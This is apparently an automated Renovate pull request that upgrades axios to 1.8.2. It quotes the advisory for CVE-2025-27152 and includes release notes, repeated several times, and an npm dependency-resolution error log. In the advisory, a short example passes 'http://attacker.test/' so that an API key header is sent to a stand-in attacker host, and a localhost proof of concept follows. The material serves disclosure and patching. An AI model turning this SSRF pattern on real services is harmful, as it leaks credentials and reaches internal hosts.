chore(deps): update dependency axios to v1.8.2 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
axios (source)	1.7.4 -> 1.8.2

GitHub Vulnerability Alerts

CVE-2025-27152

Summary

A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery).
Reference: axios/axios#6463

A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.

Details

Consider the following code snippet:

import axios from "axios";

const internalAPIClient = axios.create({
  baseURL: "http://example.test/api/v1/users/",
  headers: {
    "X-API-KEY": "1234567890",
  },
});

// const userId = "123";
const userId = "http://attacker.test/";

await internalAPIClient.get(userId); // SSRF

In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.

It is recommended that:

• When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.
• Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL.

PoC

Follow the steps below to reproduce the issue:

1. Set up two simple HTTP servers:

mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html 
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &

2. Create a script (e.g., main.js):

import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);

3. Run the script:

$ node main.js
this is server2

Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.

Impact

• Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
• SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
• Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.

---

Release Notes

axios/axios (axios)

v1.8.2

Compare Source

Bug Fixes

• core: fix the Axios constructor implementation to treat the config argument as optional; (#​6881) (6c5d4cd)
• fetch: fixed ERR_NETWORK mapping for Safari browsers; (#​6767) (dfe8411)
• headers: allow iterable objects to be a data source for the set method; (#​6873) (1b1f9cc)
• headers: fix getSetCookie by using 'get' method for caseless access; (#​6874) (d4f7df4)
• headers: fixed support for setting multiple header values from an iterated source; (#​6885) (f7a3b5e)
• http: send minimal end multipart boundary (#​6661) (987d2e2)
• types: fix autocomplete for adapter config (#​6855) (e61a893)

Features

• AxiosHeaders: add getSetCookie method to retrieve set-cookie headers values (#​5707) (80ea756)

Contributors to this release

• Dmitriy Mozgovoy
• Jay
• Willian Agostini
• George Cheng
• FatahChan
• Ionuț G. Stan

1.8.4 (2025-03-19)

Bug Fixes

• buildFullPath: handle allowAbsoluteUrls: false without baseURL (#​6833) (f10c2e0)

Contributors to this release

• Marc Hassan

1.8.3 (2025-03-10)

Bug Fixes

• add missing type for allowAbsoluteUrls (#​6818) (10fa70e)
• xhr/fetch: pass allowAbsoluteUrls to buildFullPath in xhr and fetch adapters (#​6814) (ec159e5)

Contributors to this release

• Ashcon Partovi
• StefanBRas
• Marc Hassan

1.8.2 (2025-03-07)

Bug Fixes

• http-adapter: add allowAbsoluteUrls to path building (#​6810) (fb8eec2)

Contributors to this release

• Fasoro-Joseph Alexander

1.8.1 (2025-02-26)

Bug Fixes

• utils: move generateString to platform utils to avoid importing crypto module into client builds; (#​6789) (36a5a62)

Contributors to this release

• Dmitriy Mozgovoy

v1.8.1

Compare Source

Bug Fixes

• core: fix the Axios constructor implementation to treat the config argument as optional; (#​6881) (6c5d4cd)
• fetch: fixed ERR_NETWORK mapping for Safari browsers; (#​6767) (dfe8411)
• headers: allow iterable objects to be a data source for the set method; (#​6873) (1b1f9cc)
• headers: fix getSetCookie by using 'get' method for caseless access; (#​6874) (d4f7df4)
• headers: fixed support for setting multiple header values from an iterated source; (#​6885) (f7a3b5e)
• http: send minimal end multipart boundary (#​6661) (987d2e2)
• types: fix autocomplete for adapter config (#​6855) (e61a893)

Features

• AxiosHeaders: add getSetCookie method to retrieve set-cookie headers values (#​5707) (80ea756)

Contributors to this release

• Dmitriy Mozgovoy
• Jay
• Willian Agostini
• George Cheng
• FatahChan
• Ionuț G. Stan

1.8.4 (2025-03-19)

Bug Fixes

• buildFullPath: handle allowAbsoluteUrls: false without baseURL (#​6833) (f10c2e0)

Contributors to this release

• Marc Hassan

1.8.3 (2025-03-10)

Bug Fixes

• add missing type for allowAbsoluteUrls (#​6818) (10fa70e)
• xhr/fetch: pass allowAbsoluteUrls to buildFullPath in xhr and fetch adapters (#​6814) (ec159e5)

Contributors to this release

• Ashcon Partovi
• StefanBRas
• Marc Hassan

1.8.2 (2025-03-07)

Bug Fixes

• http-adapter: add allowAbsoluteUrls to path building (#​6810) (fb8eec2)

Contributors to this release

• Fasoro-Joseph Alexander

1.8.1 (2025-02-26)

Bug Fixes

• utils: move generateString to platform utils to avoid importing crypto module into client builds; (#​6789) (36a5a62)

Contributors to this release

• Dmitriy Mozgovoy

v1.8.0

Compare Source

Bug Fixes

• core: fix the Axios constructor implementation to treat the config argument as optional; (#​6881) (6c5d4cd)
• fetch: fixed ERR_NETWORK mapping for Safari browsers; (#​6767) (dfe8411)
• headers: allow iterable objects to be a data source for the set method; (#​6873) (1b1f9cc)
• headers: fix getSetCookie by using 'get' method for caseless access; (#​6874) (d4f7df4)
• headers: fixed support for setting multiple header values from an iterated source; (#​6885) (f7a3b5e)
• http: send minimal end multipart boundary (#​6661) (987d2e2)
• types: fix autocomplete for adapter config (#​6855) (e61a893)

Features

• AxiosHeaders: add getSetCookie method to retrieve set-cookie headers values (#​5707) (80ea756)

Contributors to this release

• Dmitriy Mozgovoy
• Jay
• Willian Agostini
• George Cheng
• FatahChan
• Ionuț G. Stan

1.8.4 (2025-03-19)

Bug Fixes

• buildFullPath: handle allowAbsoluteUrls: false without baseURL (#​6833) (f10c2e0)

Contributors to this release

• Marc Hassan

1.8.3 (2025-03-10)

Bug Fixes

• add missing type for allowAbsoluteUrls (#​6818) (10fa70e)
• xhr/fetch: pass allowAbsoluteUrls to buildFullPath in xhr and fetch adapters (#​6814) (ec159e5)

Contributors to this release

• Ashcon Partovi
• StefanBRas
• Marc Hassan

1.8.2 (2025-03-07)

Bug Fixes

• http-adapter: add allowAbsoluteUrls to path building (#​6810) (fb8eec2)

Contributors to this release

• Fasoro-Joseph Alexander

1.8.1 (2025-02-26)

Bug Fixes

• utils: move generateString to platform utils to avoid importing crypto module into client builds; (#​6789) (36a5a62)

Contributors to this release

• Dmitriy Mozgovoy

v1.7.9

Compare Source

Bug Fixes

• examples: application crashed when navigating examples in browser (#​5938) (1260ded)
• missing word in SUPPORT_QUESTION.yml (#​6757) (1f890b1)
• utils: replace getRandomValues with crypto module (#​6788) (23a25af)

Features

• Add config for ignoring absolute URLs (#​5902) (#​6192) (32c7bcc)

Reverts

• Revert "chore: expose fromDataToStream to be consumable (#​6731)" (#​6732) (1317261), closes #​6731 #​6732

BREAKING CHANGES

• code relying on the above will now combine the URLs instead of prefer request URL

• feat: add config option for allowing absolute URLs

• fix: add default value for allowAbsoluteUrls in buildFullPath

• fix: typo in flow control when setting allowAbsoluteUrls

Contributors to this release

• Michael Toscano
• Willian Agostini
• Naron
• shravan || श्रvan
• Justin Dhillon
• yionr
• Shin'ya Ueoka
• Dan Dascalescu
• Nitin Ramnani
• Shay Molcho
• Jay
• fancy45daddy
• Habip Akyol
• Bailey Lissington
• Bernardo da Eira Duarte
• Shivam Batham
• Lipin Kariappa

1.7.9 (2024-12-04)

Reverts

• Revert "fix(types): export CJS types from ESM (#​6218)" (#​6729) (c44d2f2), closes #​6218 #​6729

Contributors to this release

• Jay

1.7.8 (2024-11-25)

Bug Fixes

• allow passing a callback as paramsSerializer to buildURL (#​6680) (eac4619)
• core: fixed config merging bug (#​6668) (5d99fe4)
• fixed width form to not shrink after 'Send Request' button is clicked (#​6644) (7ccd5fd)
• http: add support for File objects as payload in http adapter (#​6588) (#​6605) (6841d8d)
• http: fixed proxy-from-env module import (#​5222) (12b3295)
• http: use globalThis.TextEncoder when available (#​6634) (df956d1)
• ios11 breaks when build (#​6608) (7638952)
• types: add missing types for mergeConfig function (#​6590) (00de614)
• types: export CJS types from ESM (#​6218) (c71811b)
• updated stream aborted error message to be more clear (#​6615) (cc3217a)
• use URL API instead of DOM to fix a potential vulnerability warning; (#​6714) (0a8d6e1)

Contributors to this release

• Remco Haszing
• Jay
• Aayush Yadav
• Dmitriy Mozgovoy
• Ell Bradshaw
• Amit Saini
• Tommaso Paulon
• Akki
• Sampo Silvennoinen
• Kasper Isager Dalsgarð
• Christian Clauss
• Pavan Welihinda
• Taylor Flatt
• Kenzo Wada
• Ngole Lawson
• Haven
• Shrivali Dutt
• Henco Appel

1.7.7 (2024-08-31)

Bug Fixes

• fetch: fix stream handling in Safari by fallback to using a stream reader instead of an async iterator; (#​6584) (d198085)
• http: fixed support for IPv6 literal strings in url (#​5731) (364993f)

Contributors to this release

• Rishi556
• Dmitriy Mozgovoy

1.7.6 (2024-08-30)

Bug Fixes

• fetch: fix content length calculation for FormData payload; (#​6524) (085f568)
• fetch: optimize signals composing logic; (#​6582) (df9889b)

Contributors to this release

• Dmitriy Mozgovoy
• Jacques Germishuys
• kuroino721

1.7.5 (2024-08-23)

Bug Fixes

• adapter: fix undefined reference to hasBrowserEnv (#​6572) (7004707)
• core: add the missed implementation of AxiosError#status property; (#​6573) (6700a8a)
• core: fix ReferenceError: navigator is not defined for custom environments; (#​6567) (fed1a4b)
• fetch: fix credentials handling in Cloudflare workers (#​6533) (550d885)

Contributors to this release

• Dmitriy Mozgovoy
• Antonin Bas
• Hans Otto Wirtz

1.7.4 (2024-08-13)

Bug Fixes

• sec: CVE-2024-39338 (#​6539) (#​6543) (6b6b605)
• sec: disregard protocol-relative URL to remediate SSRF (#​6539) (07a661a)

Contributors to this release

• Lev Pachmanov
• Đỗ Trọng Hải

1.7.3 (2024-08-01)

Bug Fixes

• adapter: fix progress event emitting; (#​6518) (e3c76fc)
• fetch: fix withCredentials request config (#​6505) (85d4d0e)
• xhr: return original config on errors from XHR adapter (#​6515) (8966ee7)

Contributors to this release

• Dmitriy Mozgovoy
• Valerii Sidorenko
• prianYu

1.7.2 (2024-05-21)

Bug Fixes

• fetch: enhance fetch API detection; (#​6413) (4f79aef)

Contributors to this release

• Dmitriy Mozgovoy

1.7.1 (2024-05-20)

Bug Fixes

• fetch: fixed ReferenceError issue when TextEncoder is not available in the environment; (#​6410) (733f15f)

Contributors to this release

• Dmitriy Mozgovoy

v1.7.8

Compare Source

Bug Fixes

• examples: application crashed when navigating examples in browser (#​5938) (1260ded)
• missing word in SUPPORT_QUESTION.yml (#​6757) (1f890b1)
• utils: replace getRandomValues with crypto module (#​6788) (23a25af)

Features

• Add config for ignoring absolute URLs (#​5902) (#​6192) (32c7bcc)

Reverts

• Revert "chore: expose fromDataToStream to be consumable (#​6731)" (#​6732) (1317261), closes #​6731 #​6732

BREAKING CHANGES

• code relying on the above will now combine the URLs instead of prefer request URL

• feat: add config option for allowing absolute URLs

• fix: add default value for allowAbsoluteUrls in buildFullPath

• fix: typo in flow control when setting allowAbsoluteUrls

Contributors to this release

• Michael Toscano
• Willian Agostini
• Naron
• shravan || श्रvan
• Justin Dhillon
• yionr
• Shin'ya Ueoka
• Dan Dascalescu
• Nitin Ramnani
• Shay Molcho
• Jay
• fancy45daddy
• Habip Akyol
• Bailey Lissington
• Bernardo da Eira Duarte
• Shivam Batham
• Lipin Kariappa

1.7.9 (2024-12-04)

Reverts

• Revert "fix(types): export CJS types from ESM (#​6218)" (#​6729) (c44d2f2), closes #​6218 #​6729

Contributors to this release

• Jay

1.7.8 (2024-11-25)

Bug Fixes

• allow passing a callback as paramsSerializer to buildURL (#​6680) (eac4619)
• core: fixed config merging bug (#​6668) (5d99fe4)
• fixed width form to not shrink after 'Send Request' button is clicked (#​6644) (7ccd5fd)
• http: add support for File objects as payload in http adapter (#​6588) (#​6605) (6841d8d)
• http: fixed proxy-from-env module import (#​5222) (12b3295)
• http: use globalThis.TextEncoder when available (#​6634) (df956d1)
• ios11 breaks when build (#​6608) (7638952)
• types: add missing types for mergeConfig function (#​6590) (00de614)
• types: export CJS types from ESM (#​6218) (c71811b)
• updated stream aborted error message to be more clear (#​6615) (cc3217a)
• use URL API instead of DOM to fix a potential vulnerability warning; (#​6714) (0a8d6e1)

Contributors to this release

• Remco Haszing
• Jay
• Aayush Yadav
• Dmitriy Mozgovoy
• Ell Bradshaw
• Amit Saini
• Tommaso Paulon
• Akki
• Sampo Silvennoinen
• Kasper Isager Dalsgarð
• Christian Clauss
• Pavan Welihinda
• Taylor Flatt
• Kenzo Wada
• Ngole Lawson
• Haven
• Shrivali Dutt
• Henco Appel

1.7.7 (2024-08-31)

Bug Fixes

• fetch: fix stream handling in Safari by fallback to using a stream reader instead of an async iterator; (#​6584) (d198085)
• http: fixed support for IPv6 literal strings in url (#​5731) (364993f)

Contributors to this release

• Rishi556
• Dmitriy Mozgovoy

1.7.6 (2024-08-30)

Bug Fixes

• fetch: fix content length calculation for FormData payload; (#​6524) (085f568)
• fetch: optimize signals composing logic; (#​6582) (df9889b)

Contributors to this release

• Dmitriy Mozgovoy
• Jacques Germishuys
• kuroino721

1.7.5 (2024-08-23)

Bug Fixes

• adapter: fix undefined reference to hasBrowserEnv (#​6572) (7004707)
• core: add the missed implementation of AxiosError#status property; (#​6573) (6700a8a)
• core: fix ReferenceError: navigator is not defined for custom environments; (#​6567) (fed1a4b)
• fetch: fix credentials handling in Cloudflare workers (#​6533) ([550d885](https://redirect.github.com/axios/axio

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[renovate]

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

• any of the package files in this branch needs updating, or
• the branch becomes conflicted, or
• you click the rebase/retry checkbox if found above, or
• you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: package-lock.json

npm warn Unknown env config "store". This will stop working in the next major version of npm.
npm error code ERESOLVE
npm error ERESOLVE could not resolve
npm error
npm error While resolving: @vue/[email protected]
npm error Found: [email protected]
npm error node_modules/eslint
npm error   peer eslint@"^7.5.0 || ^8.0.0" from @babel/[email protected]
npm error   node_modules/@babel/eslint-parser
npm error     dev @babel/eslint-parser@"^7.11.0" from the root project
npm error   peer eslint@"^6.0.0 || ^7.0.0 || >=8.0.0" from @eslint-community/[email protected]
npm error   node_modules/@eslint-community/eslint-utils
npm error     @eslint-community/eslint-utils@"^4.4.0" from [email protected]
npm error     node_modules/eslint-plugin-vue
npm error       peer eslint-plugin-vue@"^9.2.0" from @vue/[email protected]
npm error       node_modules/@vue/eslint-config-standard
npm error         dev @vue/eslint-config-standard@"^8.0.0" from the root project
npm error       1 more (the root project)
npm error   12 more (eslint-plugin-n, eslint-utils, eslint-plugin-es, ...)
npm error
npm error Could not resolve dependency:
npm error peer eslint@"^8.0.1" from @vue/[email protected]
npm error node_modules/@vue/eslint-config-standard
npm error   dev @vue/eslint-config-standard@"^8.0.0" from the root project
npm error
npm error Conflicting peer dependency: [email protected]
npm error node_modules/eslint
npm error   peer eslint@"^8.0.1" from @vue/[email protected]
npm error   node_modules/@vue/eslint-config-standard
npm error     dev @vue/eslint-config-standard@"^8.0.0" from the root project
npm error
npm error Fix the upstream dependency conflict, or retry
npm error this command with --force or --legacy-peer-deps
npm error to accept an incorrect (and potentially broken) dependency resolution.
npm error
npm error
npm error For a full report see:
npm error /runner/cache/others/npm/_logs/2025-10-21T14_15_56_553Z-eresolve-report.txt
npm error A complete log of this run can be found in: /runner/cache/others/npm/_logs/2025-10-21T14_15_56_553Z-debug-0.log